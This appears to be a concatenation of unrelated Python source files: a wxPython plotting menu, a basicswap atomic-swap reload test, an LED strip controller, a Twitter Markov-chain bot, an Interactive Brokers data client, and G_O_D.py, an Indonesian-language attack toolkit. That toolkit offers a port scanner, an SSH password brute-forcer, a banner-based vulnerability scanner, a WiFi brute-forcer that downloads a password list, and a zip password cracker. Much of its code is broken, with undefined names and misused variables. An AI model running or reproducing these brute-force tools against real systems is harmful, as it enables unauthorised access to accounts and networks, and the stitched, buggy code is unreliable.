self.Bind(wx.EVT_MENU, self.controller.on_create_cmap, id=self.create_cmap_mnui.GetId())
self.plot_mnu.AppendMenu(wx.ID_ANY, "Colormaps", self.colormaps_mnu)
self.show_colorbar_mnui = wx.MenuItem(self.plot_mnu, wx.ID_ANY, text="Show Colorbar",
help="Show color scale in image plot", kind=wx.ITEM_CHECK)
self.Bind(wx.EVT_MENU, self.controller.on_toggle_colorbar, id=self.show_colorbar_mnui.GetId())
self.plot_mnu.AppendItem(self.show_colorbar_mnui)
self.show_colorbar_mnui.Check(self.controller.get_colorbar_config())
self.plot_conventional_bscans_mnui = wx.MenuItem(self.plot_mnu, wx.ID_ANY, text="Plot Conventional B-scans",
help="Plot conventional 2D B-scans", kind=wx.ITEM_CHECK)
self.Bind(wx.EVT_MENU, self.controller.on_change_bscans, id=self.plot_conventional_bscans_mnui.GetId())
self.plot_mnu.AppendItem(self.plot_conventional_bscans_mnui)
self.plot_conventional_bscans_mnui.Check(self.controller.conventional_bscans)
gridtoggle_mnui = wx.MenuItem(self.plot_mnu, wx.ID_ANY, text="Toggle Grid",
help="Turns grid on or off")
self.plot_mnu.AppendItem(gridtoggle_mnui)
self.Bind(wx.EVT_MENU, self.controller.on_toggle_grid, id=gridtoggle_mnui.GetId())
self.menubar.Append(self.plot_mnu, "&Plot")
def init_specific_ops_menu(self):
"""Creates any plot-specific Operations menu items"""
self.setcscan_mnui = wx.MenuItem(self.ops_mnu, wx.ID_ANY, text="Define C Scan",
help="Specify function to generate C Scan")
self.Bind(wx.EVT_MENU, self.controller.on_define_cscan, id=self.setcscan_mnui.GetId())
self.ops_mnu.AppendItem(self.setcscan_mnui)
self.rect_mnu = wx.Menu() # Rectification operations
self.fullrect_mnui = wx.MenuItem(self.rect_mnu, wx.ID_ANY, text="Full",
help="Full Rectification")
self.Bind(wx.EVT_MENU, self.controller.on_rectify, id=self.fullrect_mnui.GetId())
self.rect_mnu.AppendItem(self.fullrect_mnui)
self.ops_mnu.AppendMenu(wx.ID_ANY, 'Rectify', self.rect_mnu)
self.gate_mnu = wx.Menu() # Gates operations
for gate in self.controller.gates:
gate_name = self.controller.gates[gate][0]
gate_desc = "Applies a {0} gate function to the data".format(gate_name)
gate_mnui = wx.MenuItem(self.gate_mnu, id=gate, text=gate_name, help=gate_desc)
self.gate_mnu.AppendItem(gate_mnui)
self.Bind(wx.EVT_MENU, self.controller.on_apply_gate, id=gate_mnui.GetId())
self.ops_mnu.AppendMenu(wx.ID_ANY, 'Gates', self.gate_mnu)
def navtools_enabled(self):
"""Returns True if plot navigation bar is enabled"""
return self.navtools_cb.IsChecked()
@property
def plot_conventional_bscans(self):
"""True if the Bscan plots should be conventional 2D imgplots vs. the original Megaplot 1D"""
return self.plot_conventional_bscans_mnui.IsChecked()
@plot_conventional_bscans.setter
def plot_conventional_bscans(self, on=True):
"""Sets the use of conventional Bscans or the original 1D Megaplot Bscans"""
self.plot_conventional_bscans_mnui.Check(on)
@property
def plot_linear_bscans(self):
"""True if the Bscan plots should be the original 1D Megaplot plots"""
return not self.plot_conventional_bscans
|
test_reload.py | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
# Copyright (c) 2019-2021 tecnovert
# Distributed under the MIT software license, see the accompanying
# file LICENSE or http://www.opensource.org/licenses/mit-license.php.
"""
export TEST_RELOAD_PATH=/tmp/test_basicswap
mkdir -p ${TEST_RELOAD_PATH}/bin/{particl,bitcoin}
cp ~/tmp/particl-0.21.2.3-x86_64-linux-gnu.tar.gz ${TEST_RELOAD_PATH}/bin/particl
cp ~/tmp/bitcoin-0.21.1-x86_64-linux-gnu.tar.gz ${TEST_RELOAD_PATH}/bin/bitcoin
export PYTHONPATH=$(pwd)
python tests/basicswap/test_reload.py
"""
import os
import sys
import json
import shutil
import logging
import unittest
import traceback
import threading
import multiprocessing
from urllib import parse
from urllib.request import urlopen
from unittest.mock import patch
from basicswap.rpc import (
callrpc_cli,
)
from tests.basicswap.mnemonics import mnemonics
from tests.basicswap.common import (
waitForServer,
waitForNumOffers,
waitForNumBids,
waitForNumSwapping,
)
import basicswap.config as cfg
import bin.basicswap_prepare as prepareSystem
import bin.basicswap_run as runSystem
test_path = os.path.expanduser(os.getenv('TEST_RELOAD_PATH', '~/test_basicswap1'))
PARTICL_PORT_BASE = int(os.getenv('PARTICL_PORT_BASE', '11938'))
BITCOIN_PORT_BASE = int(os.getenv('BITCOIN_PORT_BASE', '10938'))
delay_event = threading.Event()
logger = logging.getLogger()
logger.level = logging.DEBUG
if not len(logger.handlers):
logger.addHandler(logging.StreamHandler(sys.stdout))
def btcRpc(client_no, cmd):
bin_path = os.path.join(test_path, 'bin', 'bitcoin')
data_path = os.path.join(test_path, 'client{}'.format(client_no), 'bitcoin')
return callrpc_cli(bin_path, data_path, 'regtest', cmd, 'bitcoin-cli')
def updateThread():
btc_addr = btcRpc(0, 'getnewaddress mining_addr bech32')
while not delay_event.is_set():
btcRpc(0, 'generatetoaddress {} {}'.format(1, btc_addr))
delay_event.wait(5)
class Test(unittest.TestCase):
@classmethod
def setUpClass(cls):
super(Test, cls).setUpClass()
for i in range(3):
client_path = os.path.join(test_path, 'client{}'.format(i))
config_path = os.path.join(client_path, cfg.CONFIG_FILENAME)
try:
shutil.rmtree(client_path)
except Exception as ex:
logger.warning('setUpClass %s', str(ex))
testargs = [
'basicswap-prepare',
'-datadir="{}"'.format(client_path),
'-bindir="{}"'.format(os.path.join(test_path, 'bin')),
'-portoffset={}'.format(i),
'-particl_mnemonic="{}"'.format(mnemonics[i]),
'-regtest', '-withoutcoin=litecoin', '-withcoin=bitcoin']
with patch.object(sys, 'argv', testargs):
prepareSystem.main()
with open(os.path.join(client_path, 'particl', 'particl.conf'), 'r') as fp:
lines = fp.readlines()
with open(os.path.join(client_path, 'particl', 'particl.conf'), 'w') as fp:
for line in lines:
if not line.startswith('staking'):
fp.write(line)
fp.write('port={}\n'.format(PARTICL_PORT_BASE + i))
fp.write('bind=127.0.0.1\n')
fp.write('dnsseed=0\n')
fp.write('discover=0\n')
fp.write('listenonion=0\n')
fp.write('upnp=0\n')
fp.write('minstakeinterval=5\n')
fp.write('smsgsregtestadjust=0\n')
for ip in range(3):
if ip != i:
fp.write('connect=127.0.0.1:{}\n'.format(PARTICL_PORT_BASE + ip))
# Pruned nodes don't provide blocks
with open(os.path.join(client_path, 'bitcoin', 'bitcoin.conf'), 'r') as fp:
lines = fp.readlines()
with open(os.path.join(client_path, 'bitcoin', 'bitcoin.conf'), 'w') as fp:
for line in lines:
if not line.startswith('prune'):
fp.write(line)
fp.write('port={}\n'.format(BITCOIN_PORT_BASE + i))
fp.write('bind=127.0.0.1\n')
fp.write('dnsseed=0\n')
fp.write('discover=0\n')
fp.write('listenonion=0\n')
fp.write('upnp=0\n')
for ip in range(3):
if ip != i:
fp.write('connect=127.0.0.1:{}\n'.format(BITCOIN_PORT_BASE + ip))
assert(os.path.exists(config_path))
def run_thread(self, client_id):
client_path = os.path.join(test_path, 'client{}'.format(client_id))
testargs = ['basicswap-run', '-datadir=' + client_path, '-regtest']
with patch.object(sys, 'argv', testargs):
runSystem.main()
def test_reload(self):
global stop_test
processes = []
for i in range(3):
processes.append(multiprocessing.Process(target=self.run_thread, args=(i,)))
processes[-1].start()
try:
waitForServer(delay_event, 12700)
num_blocks = 500
btc_addr = btcRpc(1, 'getnewaddress mining_addr bech32')
logging.info('Mining %d Bitcoin blocks to %s', num_blocks, btc_addr)
btcRpc(1, 'generatetoaddress {} {}'.format(num_blocks, btc_addr))
for i in range(20):
if delay_event.is_set():
raise ValueError('Test stopped.')
blocks = btcRpc(0, 'getblockchaininfo')['blocks']
if blocks >= num_blocks:
break
delay_event.wait(2)
assert(blocks >= num_blocks)
data = parse.urlencode({
'addr_from': '-1',
'coin_from': '1',
'coin_to': '2',
'amt_from': '1',
'amt_to': '1',
'lockhrs': '24'}).encode()
offer_id = json.loads(urlopen('http://127.0.0.1:12700/json/offers/new', data=data).read())
summary = json.loads(urlopen('http://127.0.0.1:12700/json').read())
assert(summary['num_sent_offers'] == 1)
except Exception:
traceback.print_exc()
logger.info('Waiting for offer:')
waitForNumOffers(delay_event, 12701, 1)
offers = json.loads(urlopen('http://127.0.0.1:12701/json/offers').read())
offer = offers[0]
data = parse.urlencode({
'offer_id': offer['offer_id'],
'amount_from': offer['amount_from']}).encode()
bid_id = json.loads(urlopen('http://127.0.0.1:12701/json/bids/new', data=data).read())
waitForNumBids(delay_event, 12700, 1)
bids = json.loads(urlopen('http://127.0.0.1:12700/json/bids').read())
bid = bids[0]
data = parse.urlencode({
'accept': True
}).encode()
rv = json.loads(urlopen('http://127.0.0.1:12700/json/bids/{}'.format(bid['bid_id']), data=data).read())
assert(rv['bid_state'] == 'Accepted')
waitForNumSwapping(delay_event, 12701, 1)
logger.info('Restarting client:')
c1 = processes[1]
c1.terminate()
c1.join()
processes[1] = multiprocessing.Process(target=self.run_thread, args=(1,))
processes[1].start()
waitForServer(delay_event, 12701)
rv = json.loads(urlopen('http://127.0.0.1:12701/json').read())
assert(rv['num_swapping'] == 1)
update_thread = threading.Thread(target=updateThread)
update_thread.start()
logger.info('Completing swap:')
for i in range(240):
delay_event.wait(5)
rv = json.loads(urlopen('http://127.0.0.1:12700/json/bids/{}'.format(bid['bid_id'])).read())
print(rv)
if rv['bid_state'] == 'Completed':
break
assert(rv['bid_state'] == 'Completed')
delay_event.set()
update_thread.join()
for p in processes:
p.terminate()
for p in processes:
p.join()
if __name__ == '__main__':
unittest.main()
|
G_O_D.py | from __future__ import print_function
from sys import argv,exit
import sys
import subprocess as sp
from datetime import datetime
import socket
from threading import *
import zipfile
import argparse
import optparse
import os
d=sys.platform
if(d=="win32" or d=="win62"):
sp.call('cls',shell=True)
else:
sp.call('clear',shell=True)
print("""
_________________________ ____________________ ___________
| | | | | \
| _________________| | __________. | | \
| | | | | | | _______. |
| | ______________ | | | | | | | |
| | | | | | | | | | | |
| | |________ | | | | | | | | |
| | | | | | | | | | | |
| -------------- | | ----------- | | |______| |
| | | | | / /
|_______________________| |__________________| |_______/__/
By : G.O.D
Blog : https://god-2.blogspot.com
Version : 1.0.3 FREE
""")
def PortScanner():
host=input("[1/1] Host/Ip : ")
remot=socket.gethostbyname(host)
print("\n[+] STARTING G.O.D 1.0.3 FREE")
c=datetime.now()
try:
for port in range(1,80):
e=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
f=e.connect_ex((remot,host))
if f==0:
print("[*] {} : TERBUKA".format(port))
e.close()
except KeyboardInterrupt:
sys.exit()
except socket.gaierror:
print("[!] Hostname Nya Salah Woy!\n")
except socket.error:
print("[!] Hostname Tidak Di temukan!\n")
except socket.timeout:
print("[!] gw bosen bro! kayanya nanti aja deh pas internet lagi kenceng")
g=datetime.now()
tot=g-c
print("[+] SCANNING Berhasil Dalam : ",tot)
print()
def ssh_dicker():
try:
import pxssh
max_con=5
con_loc=BoundedSemaphore(value=max_con)
found=False
fails=0
def connect(host,user,pw,release):
global found
global fails
try:
s=pxssh.pxssh()
s.login(host,user,pw)
print("[*] Password Di temukan : "+pw)
found=True
except Exception as e:
if 'read_nonblocking' in str(e):
fails+=1
connect(host,user,pw,False)
elif 'synchronize with original prompt' in str(e):
connect(host,user,pw,False)
finally:
if releas: con_lock.releas()
def main():
parser=optparse.OptionParser('usage%prog -H <target host> -u <user> -F <password-list>')
parser.add_option('-H',dest='tgtHost',type='string',help='specify target host')
parser.add_option('-F',dest='passwdFile',type='string',help='specify password file')
parser.add_option('-u',dest='user',type='string',help='specify the user')
(options,args)=parser.parse_args()
host=options.tgtHost
passFile=options.passwdFile
user=options.user
if host==None or passFile==None or user==None:
print(parser.usage)
exit(0)
fn=open(passFile,'r')
for line in fn.readlines():
if found:
print("[*] password DI Temukan!!!\n")
exit(0)
if fails>5:
print("[!] Gw Bosen coy! lama banget Timeout nya. nanti aja deh kalo sinya nya lagi oke\n")
exit(0)
con_lock.acquire()
password=line.strip("\r").strip("\n")
print("[+] Testing : "+str(password))
t=Thread(target=connect,args=(host,user,password,True))
child=t.start()
if __name__ == '__main__':
main()
except ImportError:
print("\n[!] PXSSH : Tidak Di temukan!!!\n")
def ServerVulnScanner():
def retBanner(ip,port):
try:
socket.getdefaulttimeout(2)
s=socket.socket()
s.connect((ip,port))
banner=s.recv(1024)
return banner
except:
return
def checkVulns(banner,filename):
f=open(filename,'r')
for line in f.readlines():
if line.strip('\n') in banner:
print("[*] Server Terbukti Lemah !!! : "+banner.strip('\n'))
def main():
if len(sys.argv)==2:
filename=sys.argv[1]
if not os.path.isfile(filename):
print("[!] "+filename+" tidak benar atau tidak di temukan!\n")
exit(0)
if not os.access(filename,os.R_OK):
print("[!] "+filename+" access denied.")
exit(0)
else:
print("[!] Usage : "+str(sys.argv[0])+" <vuln filename>")
exit(0)
portList=[21,22,25,80,110,443]
ips=input("Host : ")
for x in range(147,150):
ip=ips+str(x)
for port in portList:
banner=retBanner(ip,port)
if banner:
print("[+] "+ip+": "+banner)
checkVulns(banner,filename)
if __name__ == '__main__':
main()
def Wifi_Brute_force():
try:
from scapy.all import srp,Ether,ARP,conf
import urllib2
from wifi import Cell,Scheme,exceptions
def scan_ips(interface='wlan0',ips='192.168.1.0/24'):
print("""
[+] STARTING G.O.D
""")
try:
print("[+] SCANNING ")
conf.verb=0
ether=Ether(dst="ff:ff:ff:ff:ff:ff")
arp=ARP(pdst=ips)
answer,unanswer=srp(ether/arp,timeout=2,iface=interface,inter=0.1)
for sent,received in answer:
print(received.summary())
except KeyboardInterrupt:
sys.exit(1)
def start():
print("[+] bentar ya! download passwordlist nya dulu hehe")
url="https://raw.githubusercontent.com/danielmiessler/SecLists/master/Passwords/10_million_password_list_top_100000.txt"
response=urllib2.urlopen(url)
passwords=txt.splitlines()
networks=Cell.all('wlan0')
nb_loops=len(passwords)*len(networks)
print("[*] {} networks di temukan!. program akan looping {} kali!!".format(len(passwords),nb_loops))
nb_test=0
for password in passwords:
for cell in networks:
try:
scheme=Scheme.for_cell('wlan0','home',cell,'test')
scheme.activate()
print("[+] Connect ke {} dengan `{}` passkey bekerja!!".format(cell,'test'))
sys.exit(0)
except exceptions.ConnectionError as e:
pass
finally:
nb_test+=1
sys.stdout.write('\r{} / {}'.format(nb_test,nb_loops))
sys.stdout.flush()
print("You Are Not Lucky :'(\nFUCK YOU!!")
def main():
parser=argparse.ArgumentParser()
parser.add_argument("-w","--wifi_brute_force",action="store_true",help="Cobalah untuk mem bruteforce beberapa wifi yang kena respond dari area mu")
parser.add_argument("-a","--scan_ips",action="store_true",help="Scan semua IPs dalam network ini")
args=parser.parse_args()
if args.wifi_brute_force:
wifi_bruteforce.start
if args.scan_ips:
network_scanner.scan()
if __name__ == '__main__':
main()
except ImportError:
print("[!] scapy : Tidak Di temukan!\n")
def zip_attack():
def extractFile(zFile,password):
try:
zFile.extractall(pwd=password)
print("[*] Password Di Temukan = "+password)
return True
except:
return False
def main():
parser=argparse.ArgumentParser("%prog -f <zipfile> -d <dictionary>")
parser.add_argument("-f",dest="zname",help="membutuhkan zip file berpassword")
parser.add_argument("-d",dest="dname",help="membutuhkan file dictionary")
if args.zname==None:
print(parser.usage)
exit(0)
elif args.dname==None:
zname=args.zname
dname='passwords.txt'
else:
zname=args.zname
dname=args.dname
zFile=zipfile.ZipFile(zname)
passFile=open(dname)
for line in passFile.readlines():
password=line.strip("\n")
found=extractFile(zFile,password)
if found==True:
exit(0)
print("[-] Password Tidak Di temukan!")
if __name__ == "__main__":
main()
def Ask():
print("""
[1] Port Scanner
[2] SSH Dicker
[3] Server Vuln Scanner
[4] Wifi Brute Force
[5] Zip Attacker
""")
def Optionss():
while True:
x=input("[?] ")
if(x=="1"):
PortScanner()
elif(x=="2"):
ssh_dicker()
elif(x=="3"):
ServerVulnScanner()
elif(x=="4"):
Wifi_Brute_force()
elif(x=="5"):
zip_attack()
elif(x!="\n"):
print("[!] Invalid Options!")
Ask()
Optionss()
|
LedStrip.py | import colorsys
import logging
from threading import Thread, Event
from time import sleep
from Animation import LinearInterpolateAnimation
class LedStrip:
LED_COUNT = 180
def __init__(self, node):
self.node = node
self.rgb_colors = [0, 0, 0]
self.animation = None
self.color_bytes_str = ''
self.update_event = Event()
self.thread = Thread(target=self.thread_function, daemon=True)
self.thread.start()
def set_animation(self, animation):
self.animation = animation
self.update_event.set()
def clear_animation(self):
self.animation = None
self.update_event.set()
def set_color_rgb(self, rgb_colors):
self.clear_animation()
self.rgb_colors = rgb_colors
self.update_event.set()
def set_color_hsl(self, hsl_colors):
self.clear_animation()
self.rgb_colors = LedStrip.convert_hsl_to_rgb(hsl_colors)
self.update_event.set()
def animate_to_rgb(self, rgb_color, duration_sec):
self.clear_animation()
self.animation = LinearInterpolateAnimation(LedStrip.LED_COUNT, self.rgb_colors, rgb_color, duration_sec)
self.rgb_colors = rgb_color[:]
self.update_event.set()
def get_color_rgb_str(self):
return LedStrip.color_array_to_str(self.rgb_colors)
def get_color_hsl(self):
return LedStrip.convert_rgb_to_hsl(self.rgb_colors)
def get_color_hsl_str(self):
return LedStrip.color_array_to_str(LedStrip.convert_rgb_to_hsl(self.rgb_colors))
def thread_function(self):
while True:
self.update_event.wait()
write_current_color_and_clear_evt = True
if self.animation:
anim_result = self.animation.step()
if anim_result:
value_str = ''
for color in anim_result:
value_str += '%02x%02x%02x' % (color[0], color[1], color[2])
self.update_color_bytes(value_str)
write_current_color_and_clear_evt = False
if write_current_color_and_clear_evt:
self.update_color_bytes(('%02x%02x%02x' % (self.rgb_colors[0], self.rgb_colors[1], self.rgb_colors[2])) * LedStrip.LED_COUNT)
self.update_event.clear()
sleep(0.010)
def update_color_bytes(self, color_bytes_str):
"""
update LED colors on device (if required)
:param color_bytes_str: HEX string containing the color of each LED
"""
if self.color_bytes_str == color_bytes_str:
return # no need to update
try:
self.node.ColorBytes = color_bytes_str
self.color_bytes_str = color_bytes_str
except BaseException:
logging.error('Writing LED strip failed')
@staticmethod
def color_array_to_str(array):
return '%d,%d,%d' % (array[0], array[1], array[2])
@staticmethod
def convert_rgb_to_hsl(rgb_colors):
hls = colorsys.rgb_to_hls(rgb_colors[0] / 255, rgb_colors[1] / 255, rgb_colors[2] / 255)
return [int(hls[0] * 100), int(hls[2] * 100), int(hls[1] * 100)]
@staticmethod
def convert_hsl_to_rgb(hsl_colors):
rgb = colorsys.hls_to_rgb(hsl_colors[0] / 100, hsl_colors[2] / 100, hsl_colors[1] / 100)
return [int(rgb[0] * 255), int(rgb[1] * 255), int(rgb[2] * 255)]
|
mainbot.py | # Import the twython module
from . import twythonaccess
# import time and sys
import time
# import the users class
from .users import Users
# import markov
from .markov import Markov
# import fastreplystreamer
from .fastreplystreamer import FastReplyStreamer
# import apikeys to authenticate streamer
from . import apikeys
# import Thread to be able to run concurrently
from threading import Thread
# randint for the tweet interval
from random import randint
# the main function will be called when this script is called in terminal
# the bash command "python3 mainbot.py" will call this function
def main():
# first setup users and markov objects
# set this up with error handling
while True:
try:
setup()
break
except Exception as exception:
print(exception)
print("will sleep for 1 hour to avoid exception")
time.sleep(60*60)
print("exception sleep in setup now finished; retrying setup")
# create two threads, which will call reply_streamer and tweet_loop
# use threads to make these threads be able to run concurrently
reply_streamer_thread = Thread(target = reply_streamer)
tweet_loop_thread = Thread(target = tweet_loop)
# start both threads
reply_streamer_thread.start()
tweet_loop_thread.start()
# these threads will run infinitely
# create the global markov and users instances
def setup():
global markov, users
# Declare all the global variabes which will be used
# The users object will contain
# the two arrays: followers and followfollowers
# This instantiation will also start the process of checking for new followers,
# and in those cases greet them
users = Users()
print("initialized users")
# instantiate the markov object
#markov = Markov(users.followers_tweets + users.followfollowers_tweets)
# do this instead: mix the followers' tweets with tweets from goranhagglund and rossa_d
twythonaccess.check_if_requests_are_maximum(170)
twythonaccess.check_if_requests_are_maximum(170)
ghAndRdTweets = users.get_tweets([
twythonaccess.authorize().show_user(screen_name="goranhagglund"),
twythonaccess.authorize().show_user(screen_name="rossa_d")])
markov = Markov(users.followers_tweets + ghAndRdTweets + users.followfollowers_tweets)
print("initialized markov")
# the user shoud be able to reference the markov object
users.markov = markov
print("setup complete")
# this function will be executed in one thread, and tweet_loop on the other
# purpose to isolate this in streaming api is to reply to all tweets mentioning self quickly
def reply_streamer():
print("starting registering for streaming api")
# initialize the fastreplystreamer
streamer = FastReplyStreamer(apikeys.CONSUMER_KEY, apikeys.CONSUMER_SECRET, apikeys.ACCESS_TOKEN, apikeys.ACCESS_TOKEN_SECRET)
# pass this markov instance to the streamer, so it will be able to generate replies
streamer.markov = markov
# start the filter
# nest it in error handling
while True:
try:
streamer.statuses.filter(track=("@" + twythonaccess.screen_name))
except Exception as exception:
# print the exception and then sleep for an hour
# the sleep will reset rate limit
# if twitter's servers were down, they may be up after the sleep
# after the sleep, the filter function will be called anew
print(exception)
print("will sleep for 1 hour to avoid exception")
time.sleep(60*60)
print("finished sleep after exception in streaming api. will now start anew")
# the run loop, which will continue in infinity
def tweet_loop():
while True:
print("start loop")
# the try is for error handling
# if any of the twython methods (nested or not) raise an exception,
# then it will be caught in this except clause
# the except clause will do nothing but sleep for a while,
# and then continue with the loop
try:
# send tweet
while True:
# generate new tweet
tweet = markov.generate_tweet()
print("tweet generated: " + tweet)
if twythonaccess.send_tweet(tweet):
# the generated tweet is okay
print("tweet approved or passed")
break
# sleeping point, if need for sleep
# sleep for one day
# make the sleep somewhat randomized
# can range from 5 minutes to 3 days
# make the distribution curve peak at 24 hours
# get a random integer between 5 and 2.25*24*60, representing minutes
# based on calculations, do first loop 5 times and second loop once
min_sleep = 5
max_sleep = 2.25*24*60
sleep_minutes = randint(min_sleep, max_sleep)
for i in range(0,4):
# if the value isn't in the specified range, then regenerate the value
# this will increase the statistical probability of the value falling in the range, while not limiting the value directly
# first limit the value in a close range, then in a bigger range, order is important
# this will make the curve like a double-sided stairway with three levels, the middle level being the widest
if sleep_minutes < 23*60 or sleep_minutes > 27*60:
sleep_minutes = randint(min_sleep, max_sleep)
# second loop, wider, designed to catch almost all values
for i in range(0,1):
if sleep_minutes < 6*60 or sleep_minutes > 46*60:
sleep_minutes = randint(min_sleep, max_sleep)
print("will sleep for " + str(sleep_minutes) + " minutes")
time.sleep(sleep_minutes * 60)
print("has slept for " + str(sleep_minutes) + " minutes")
# temporary sleep
#time.sleep(60*60)
# update the users followers
users.check_new_followers()
print("updated followers")
#print("followers:")
#for follower in users.followers:
#print(follower["screen_name"])
#time.sleep(1)
#print "followfollowers:"
#for followfollower in users.followfollowers:
#print(followfollower["screen_name"])
#time.sleep(1)
# update the tweets
users.check_new_tweets()
print("updated tweets")
#print("follower's tweets:")
#for follower_tweet in users.followers_tweets:
#print(follower_tweet["text"])
#time.sleep(1)
# get the rossana and goran tweets
ghAndRd = ["goranhagglund", "rossa_d"]
ghAndRdTweets = []
for id in ghAndRd:
twythonaccess.check_if_requests_are_maximum(170)
this_users_tweets = twythonaccess.authorize().get_user_timeline(screen_name=id, trim_user=True, include_rts=False)
ghAndRdTweets.extend(this_users_tweets)
# update the markov
markov.update_markov(users.followers_tweets + ghAndRdTweets + users.followfollowers_tweets)
print("markov updated")
except Exception as exception:
# print out the exception, and then sleep for 1 hour
# the exception may be a rate limit, or it may be due to twitter's servers being down
# either way, a sleep will help
print(exception)
print("will sleep for 1 hour to avoid exception")
time.sleep(60*60)
print("finished exception sleep; will resume tweet generation loop as normal")
# if called directly (as in "python3 mainbot.py"), then call main() function
if __name__ == "__main__":
main()
|
histdata.py | import queue
from dataclasses import dataclass, field
from datetime import datetime, date
from threading import Thread
from typing import List, Callable
import pandas
from dateutil.relativedelta import relativedelta
from ibapi.client import EClient
from ibapi.contract import Contract as IBcontract
from ibapi.wrapper import EWrapper
DEFAULT_HISTORIC_DATA_ID = 50
DEFAULT_GET_CONTRACT_ID = 43
FINISHED = object()
STARTED = object()
TIME_OUT = object()
MAX_WAIT_SECONDS = 30
@dataclass
class Observable:
observers: List[Callable] = field(default_factory=list)
def register(self, observer: Callable):
self.observers.append(observer)
def unregister(self, observer: Callable):
self.observers.remove(observer)
def notify(self, *args, **kwargs):
for observer in self.observers:
observer(*args, **kwargs)
class _FinishableQueue(object):
def __init__(self, queue_to_finish):
self._queue = queue_to_finish
self.status = STARTED
def get(self, timeout):
"""
Returns a list of queue elements once timeout is finished, or a FINISHED flag is received in the queue
:param timeout: how long to wait before giving up
:return: list of queue elements
"""
contents_of_queue = []
finished = False
while not finished:
try:
current_element = self._queue.get(timeout=timeout)
if current_element is FINISHED:
finished = True
self.status = FINISHED
else:
contents_of_queue.append(current_element)
# keep going and try and get more data
except queue.Empty:
# If we hit a time out it's most probable we're not getting a finished element any time soon
# give up and return what we have
finished = True
self.status = TIME_OUT
return contents_of_queue
def timed_out(self):
return self.status is TIME_OUT
class _Wrapper(EWrapper):
"""
The wrapper deals with the action coming back from the IB gateway or TWS instance
We override methods in EWrapper that will get called when this action happens, like currentTime
Extra methods are added as we need to store the results in this object
"""
def __init__(self):
super().__init__()
self._contractDetails = {}
self._historicDataDict = {}
self.initError()
# error handling code
def initError(self):
errorQueue = queue.Queue()
self._errorQueue = errorQueue
def getError(self, timeout=5):
if self.isError():
try:
return self._errorQueue.get(timeout=timeout)
except queue.Empty:
return None
return None
def isError(self):
an_error_if = not self._errorQueue.empty()
return an_error_if
def error(self, id, errorCode, errorString):
errorMsg = "IB error id %d error code %d string %s" % (id, errorCode, errorString)
self._errorQueue.put(errorMsg)
# get contract details code
def initContractDetails(self, reqId):
contract_details_queue = self._contractDetails[reqId] = queue.Queue()
return contract_details_queue
def contractDetails(self, reqId, contractDetails):
if reqId not in self._contractDetails.keys():
self.initContractDetails(reqId)
self._contractDetails[reqId].put(contractDetails)
def contractDetailsEnd(self, reqId):
if reqId not in self._contractDetails.keys():
self.initContractDetails(reqId)
self._contractDetails[reqId].put(FINISHED)
def initHistoricPriceQueue(self, tickerId):
historic_data_queue = self._historicDataDict[tickerId] = queue.Queue()
return historic_data_queue
def historicalData(self, tickerId, bar):
barData = (bar.date, bar.open, bar.high, bar.low, bar.close, bar.volume)
historic_data_dict = self._historicDataDict
if tickerId not in historic_data_dict.keys():
self.initHistoricPriceQueue(tickerId)
historic_data_dict[tickerId].put(barData)
def historicalDataEnd(self, tickerId, start: str, end: str):
if tickerId not in self._historicDataDict.keys():
self.initHistoricPriceQueue(tickerId)
self._historicDataDict[tickerId].put(FINISHED)
class _Client(EClient, Observable):
def __init__(self, wrapper):
EClient.__init__(self, wrapper)
Observable.__init__(self)
def resolveContract(self, ibContract, reqId=DEFAULT_GET_CONTRACT_ID):
"""
From a partially formed contract, returns a fully fledged version
:returns fully resolved IB contract
"""
# Make a place to store the data we're going to return
contract_details_queue = _FinishableQueue(self.wrapper.initContractDetails(reqId))
self.notify("Getting full contract details from the server... ")
self.reqContractDetails(reqId, ibContract)
## Run until we get a valid contract(s) or get bored waiting
MAX_WAIT_SECONDS = 10
new_contract_details = contract_details_queue.get(timeout=MAX_WAIT_SECONDS)
while self.wrapper.isError():
self.notify(self.wrapper.getError())
if contract_details_queue.timed_out():
self.notify("Exceeded maximum wait for wrapper to confirm finished - seems to be normal behaviour")
if len(new_contract_details) == 0:
self.notify("Failed to get additional contract details: returning unresolved contract")
return ibContract
if len(new_contract_details) > 1:
self.notify("got multiple contracts using first one")
new_contract_details = new_contract_details[0]
resolved_ibcontract = new_contract_details.contract
return resolved_ibcontract
def fetchHistoricalData(self, ibContract, endDataTime=datetime.today().strftime("%Y%m%d %H:%M:%S %Z"),
durationStr="1 Y", barSizeSetting="1 day", tickerId=DEFAULT_HISTORIC_DATA_ID):
# Make a place to store the data we're going to return
historic_data_queue = _FinishableQueue(self.wrapper.initHistoricPriceQueue(tickerId))
self.reqHistoricalData(
tickerId, # reqId,
ibContract, # contract,
endDataTime, # endDateTime,
durationStr, # durationStr,
barSizeSetting, # barSizeSetting,
"TRADES", # whatToShow,
1, # useRTH,
2, # formatDate
False, # KeepUpToDate <<==== added for api 9.73.2
[] # chartoptions not used
)
# Wait until we get a completed data, an error, or get bored waiting
self.notify("Getting historical data from the server... could take %d seconds to complete " % MAX_WAIT_SECONDS)
historic_data = historic_data_queue.get(timeout=MAX_WAIT_SECONDS)
cancelTask = False
while self.wrapper.isError():
self.notify(self.wrapper.getError())
cancelTask = True
if historic_data_queue.timed_out():
self.notify("Exceeded maximum wait for wrapper to confirm finished - seems to be normal behaviour")
cancelTask = True
if cancelTask:
self.cancelHistoricalData(tickerId)
return historic_data
class BrokerClient(Observable):
def __init__(self, ipaddress: str, port: int, clientId: int):
Observable.__init__(self)
self._wrapper = _Wrapper()
self._client = _Client(wrapper=self._wrapper)
self.connect(ipaddress, port, clientId)
@property
def lowLevelClient(self):
return self._client
def buildContract(self, symbol: str, secType: str, exchange: str, currency: str):
contract = IBcontract()
contract.symbol = symbol
contract.secType = secType
contract.exchange = exchange
contract.currency = currency
return self._client.resolveContract(contract)
def fetchHistoricalData(self, contract, fromDate, endDate, barSizeSetting):
timeFormat = "%Y%m%d %H:%M:%S %Z"
dateDuration = endDate - fromDate
chunks = []
currentMonth = (fromDate + relativedelta(months=1)) - fromDate
if dateDuration.days <= currentMonth.days:
dateStr = endDate.strftime(timeFormat)
chunks = [(dateStr, f'{dateDuration.days} D')]
else:
offsetDate = endDate
daysCount = dateDuration.days
while True:
dateStr = offsetDate.strftime(timeFormat)
chunks.append((dateStr, '1 M'))
month = offsetDate - (offsetDate - relativedelta(months=1))
offsetDate -= relativedelta(months=1)
daysCount -= month.days
if daysCount <= 0:
break
historicData = []
counter = 1
chunks.reverse()
for endDateStr, durationStr in chunks:
self.notify(endDateStr)
